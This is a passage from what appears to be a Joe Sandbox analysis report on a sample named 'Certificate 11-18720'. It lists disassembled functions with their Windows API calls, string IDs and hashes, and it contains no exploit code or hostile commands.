                                                                                    Function 005F94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 005F94FE
                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 005F9549
                                                                                    • VariantInit.OLEAUT32(?), ref: 005F955B
                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 005F957B
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 005F95BE
                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 005F95D2
                                                                                    • VariantClear.OLEAUT32(?), ref: 005F95E7
                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 005F95F4
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005F95FD
                                                                                    • VariantClear.OLEAUT32(?), ref: 005F960F
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 005F961A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                    • String ID:
                                                                                    • API String ID: 2706829360-0
                                                                                    • Opcode ID: 5428c69626a8a776006b556a76d6e92f12d5b86bb2bff455bf62d7bd6b09eaaf
                                                                                    • Instruction ID: 175b3e44569e6877415d6b402a57cd6b41fd8f23e3e161f8a80a78f04104ca22
                                                                                    • Opcode Fuzzy Hash: 5428c69626a8a776006b556a76d6e92f12d5b86bb2bff455bf62d7bd6b09eaaf
                                                                                    • Instruction Fuzzy Hash: CD411C35E00219AFCB01EFA4D848AEEBFB9FF48354F008465E511E7261DB75EA45CBA1
                                                                                    Function 0061BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?g$|?g
                                                                                    • API String ID: 2862541840-3112630198
                                                                                    • Opcode ID: 567ab739826d79063efe155fc5295a72060a719ece1333fd5d37f43313f89188
                                                                                    • Instruction ID: daf2217a99acd6a5ee150dca271bd3ede8cacb319f6187213bb74e50a84f5dda
                                                                                    • Opcode Fuzzy Hash: 567ab739826d79063efe155fc5295a72060a719ece1333fd5d37f43313f89188
                                                                                    • Instruction Fuzzy Hash: 5691A271E00215ABDF24CFA5D884FEEBBBAEF85710F149159F505AB290DB709981CFA0
                                                                                    Function 0061ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • CoInitialize.OLE32 ref: 0061ADF6
                                                                                    • CoUninitialize.OLE32 ref: 0061AE01
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,0064D8FC,?), ref: 0061AE61
                                                                                    • IIDFromString.OLE32(?,?), ref: 0061AED4
                                                                                    • VariantInit.OLEAUT32(?), ref: 0061AF6E
                                                                                    • VariantClear.OLEAUT32(?), ref: 0061AFCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                    • API String ID: 834269672-1287834457
                                                                                    • Opcode ID: 538fe6a3d949fbf82570a50dc774bf1add721c02cc84a90f1c93a08c66a633df
                                                                                    • Instruction ID: 1924748830f1f67edef51f8255da5a539db671b18b3f0e0fdd129899091c2723
                                                                                    • Opcode Fuzzy Hash: 538fe6a3d949fbf82570a50dc774bf1add721c02cc84a90f1c93a08c66a633df
                                                                                    • Instruction Fuzzy Hash: 6461AF706093119FD711DFA4C848BAABBEABF89714F08450DF9859B292C770ED85CB93
                                                                                    Function 00618107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00618168
                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 006181AD
                                                                                    • gethostbyname.WSOCK32(?), ref: 006181B9
                                                                                    • IcmpCreateFile.IPHLPAPI ref: 006181C7
                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00618237
                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0061824D
                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006182C2
                                                                                    • WSACleanup.WSOCK32 ref: 006182C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                    • String ID: Ping
                                                                                    • API String ID: 1028309954-2246546115
                                                                                    • Opcode ID: 320c598882eebeac5e23cdb50fee6bc2a7d99fcfbc37086031e4fd6e91caa5da
                                                                                    • Instruction ID: c4754d6b3c0a0fc7e0b5d390ca10c5b36a9e353ac3a4b09b42b3ac3aed01b196
                                                                                    • Opcode Fuzzy Hash: 320c598882eebeac5e23cdb50fee6bc2a7d99fcfbc37086031e4fd6e91caa5da
                                                                                    • Instruction Fuzzy Hash: 6F51A035600701AFD7219F64CC49BAABBE6BF49310F08892AF955DB3A0DB30ED41CB81
                                                                                    Function 0060E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0060E396
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0060E40C
                                                                                    • GetLastError.KERNEL32 ref: 0060E416
                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0060E483
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                    • API String ID: 4194297153-14809454
                                                                                    • Opcode ID: d9a700ecc4846b2b05e3bfd8176147a7641e68143c17b898739a9c0fb63f961c
                                                                                    • Instruction ID: 7b19dc9222ccac3a1a3cc1be0ec656a8f63522f566b76200368054c5ec5d4480
                                                                                    • Opcode Fuzzy Hash: d9a700ecc4846b2b05e3bfd8176147a7641e68143c17b898739a9c0fb63f961c
                                                                                    • Instruction Fuzzy Hash: 41317E35A4021A9FDB05EFA4C849EAEBBF6FF55300F14881AE505EB3D1DB719A02C751
                                                                                    Function 005FB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 005FB98C
                                                                                    • GetDlgCtrlID.USER32 ref: 005FB997
                                                                                    • GetParent.USER32 ref: 005FB9B3
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 005FB9B6
                                                                                    • GetDlgCtrlID.USER32(?), ref: 005FB9BF
                                                                                    • GetParent.USER32(?), ref: 005FB9DB
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 005FB9DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1383977212-1403004172
                                                                                    • Opcode ID: 11e2dd0fbc6a90005283e5a9cbe7fbfbaf82f77f4aa66b6b1045eb2ae0b1eab8
                                                                                    • Instruction ID: 04735e1a26bbf9ee9df5fb53b7fb03d617e2659de9c9cd8fcbe431184b3f63d0
                                                                                    • Opcode Fuzzy Hash: 11e2dd0fbc6a90005283e5a9cbe7fbfbaf82f77f4aa66b6b1045eb2ae0b1eab8
                                                                                    • Instruction Fuzzy Hash: 3521C474A00109BFDB04ABA4CC85EBEBF75FB46300F104119F65597291DBB958159B20
                                                                                    Function 005FB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005FBA73
                                                                                    • GetDlgCtrlID.USER32 ref: 005FBA7E
                                                                                    • GetParent.USER32 ref: 005FBA9A
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 005FBA9D
                                                                                    • GetDlgCtrlID.USER32(?), ref: 005FBAA6
                                                                                    • GetParent.USER32(?), ref: 005FBAC2
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 005FBAC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1383977212-1403004172
                                                                                    • Opcode ID: dbcec9185b6d46a622948e72e9f45961600e8dd4c3ed5107a7790165ab1a3d16
                                                                                    • Instruction ID: 92093dfd5e8ea1516ef340a3d8b07931c6bd375a195eda87c48592dbe76abfb9
                                                                                    • Opcode Fuzzy Hash: dbcec9185b6d46a622948e72e9f45961600e8dd4c3ed5107a7790165ab1a3d16
                                                                                    • Instruction Fuzzy Hash: 6921F2B4A00109BFDB01ABA4CC85FFEBF7AFF4A300F044019F655A7192DB7988199B20
                                                                                    Function 005FBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32 ref: 005FBAE3
                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 005FBAF8
                                                                                    • _wcscmp.LIBCMT ref: 005FBB0A
                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005FBB85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                    • API String ID: 1704125052-3381328864
                                                                                    • Opcode ID: 71dfbe73eaa3535c5594b511fd05433b93ae795d690492fabb21af5b08f7dc18
                                                                                    • Instruction ID: f8a0fa07ff9e8f7eb24be613bf80eca5d74bd4674dd322f2f7ee3f768e0179f6
                                                                                    • Opcode Fuzzy Hash: 71dfbe73eaa3535c5594b511fd05433b93ae795d690492fabb21af5b08f7dc18
                                                                                    • Instruction Fuzzy Hash: 92112C76A4834BFBFA246631DC1BDB63F9EFB51720F200022FA58E40D5FFA598514514
                                                                                    Function 0061B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 0061B2D5
                                                                                    • CoInitialize.OLE32(00000000), ref: 0061B302
                                                                                    • CoUninitialize.OLE32 ref: 0061B30C
                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0061B40C
                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0061B539
                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0061B56D
                                                                                    • CoGetObject.OLE32(?,00000000,0064D91C,?), ref: 0061B590
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0061B5A3
                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0061B623
                                                                                    • VariantClear.OLEAUT32(0064D91C), ref: 0061B633
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2395222682-0
                                                                                    • Opcode ID: 7bae5cf4afcf3362c0fa8feed732f3a962d1263b17f7c405fd6d15576d900ed1
                                                                                    • Instruction ID: 13e57ef63f28083fb1362443fada0614c3ed8a371e08989661b4228a565900f1
                                                                                    • Opcode Fuzzy Hash: 7bae5cf4afcf3362c0fa8feed732f3a962d1263b17f7c405fd6d15576d900ed1
                                                                                    • Instruction Fuzzy Hash: C9C12471608305AFC700DF64C884AABBBEABF89308F04595DF58ADB251DB71ED45CB52
                                                                                    Function 005EACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 005EACC1
                                                                                      • Part of subcall function 005E7CF4: __mtinitlocknum.LIBCMT ref: 005E7D06
                                                                                      • Part of subcall function 005E7CF4: EnterCriticalSection.KERNEL32(00000000,?,005E7ADD,0000000D), ref: 005E7D1F
                                                                                    • __calloc_crt.LIBCMT ref: 005EACD2
                                                                                      • Part of subcall function 005E6986: __calloc_impl.LIBCMT ref: 005E6995
                                                                                      • Part of subcall function 005E6986: Sleep.KERNEL32(00000000,000003BC,005DF507,?,0000000E), ref: 005E69AC
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 005EACED
                                                                                    • GetStartupInfoW.KERNEL32(?,00676E28,00000064,005E5E91,00676C70,00000014), ref: 005EAD46
                                                                                    • __calloc_crt.LIBCMT ref: 005EAD91
                                                                                    • GetFileType.KERNEL32(00000001), ref: 005EADD8
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 005EAE11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 1426640281-0
                                                                                    • Opcode ID: 319e805f5d1483064e060ef009b97065dcbaf48db8a8e8d1a6f0bb1cbf81e7f9
                                                                                    • Instruction ID: 987a3d85618cf4549f63a026c34405bc8a15f6b38e5e7982d451a92179416889
                                                                                    • Opcode Fuzzy Hash: 319e805f5d1483064e060ef009b97065dcbaf48db8a8e8d1a6f0bb1cbf81e7f9
                                                                                    • Instruction Fuzzy Hash: 3081F2719053828FDB28CF79C8845A9BFF5BF46320B24569DD4E6AB3D1C734A802CB52
                                                                                    Function 00604025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00604047
                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006030A5,?,00000001), ref: 0060405B
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00604062
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006030A5,?,00000001), ref: 00604071
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00604083
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,006030A5,?,00000001), ref: 0060409C
                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006030A5,?,00000001), ref: 006040AE
                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006030A5,?,00000001), ref: 006040F3
                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,006030A5,?,00000001), ref: 00604108
                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,006030A5,?,00000001), ref: 00604113
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                    • String ID:
                                                                                    • API String ID: 2156557900-0
                                                                                    • Opcode ID: 59937f05024d91455f3ae7c6bf98dcbfc8457b4cf74c328e04404f8d2228835f
                                                                                    • Instruction ID: db5750259dc368a5bdef658685087c5b3ebf69be5f780619847f119ba681319d
                                                                                    • Opcode Fuzzy Hash: 59937f05024d91455f3ae7c6bf98dcbfc8457b4cf74c328e04404f8d2228835f
                                                                                    • Instruction Fuzzy Hash: D831E1B5940210BFDB24DF14DC86BBA77ABABA0711F119205FA05E63E0CFB499808B64
                                                                                    Function 0063DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 005DB496
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 005DB4A0
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 005DB4B5
                                                                                    • GetStockObject.GDI32(00000005), ref: 005DB4BD
                                                                                    • GetClientRect.USER32(?), ref: 0063DD63
                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0063DD7A
                                                                                    • GetWindowDC.USER32(?), ref: 0063DD86
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0063DD95
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0063DDA7
                                                                                    • GetSysColor.USER32(00000005), ref: 0063DDC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3430376129-0
                                                                                    • Opcode ID: 2a436d4d8a9939ba09f7a537bca5e9232165349262949a84a5074acdcc9c1200
                                                                                    • Instruction ID: dc8e881e0bcbb5e3798fd543b4d545355955faa04b853062f908562c93ca2d21
                                                                                    • Opcode Fuzzy Hash: 2a436d4d8a9939ba09f7a537bca5e9232165349262949a84a5074acdcc9c1200
                                                                                    • Instruction Fuzzy Hash: 1B114C39900205FFEB216FA4EC08BE97F67FB06325F119626FA66951E2CB310941DB21
                                                                                    Function 005C3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005C30DC
                                                                                    • CoUninitialize.OLE32(?,00000000), ref: 005C3181
                                                                                    • UnregisterHotKey.USER32(?), ref: 005C32A9
                                                                                    • DestroyWindow.USER32(?), ref: 00635079
                                                                                    • FreeLibrary.KERNEL32(?), ref: 006350F8
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00635125
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 469580280-3243417748
                                                                                    • Opcode ID: 10dcd25ebc1bb7019651755daf5e4f8f6252aefd69e2320b70fb271dd721ff5b
                                                                                    • Instruction ID: 0aad515ec4e0050785e7aaba2e0c9a844e8935e4b82231a1dd069d7c3a0ead74
